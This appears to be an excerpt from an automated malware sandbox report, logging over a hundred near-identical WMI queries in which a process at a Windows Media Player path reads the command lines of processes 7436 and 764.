                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
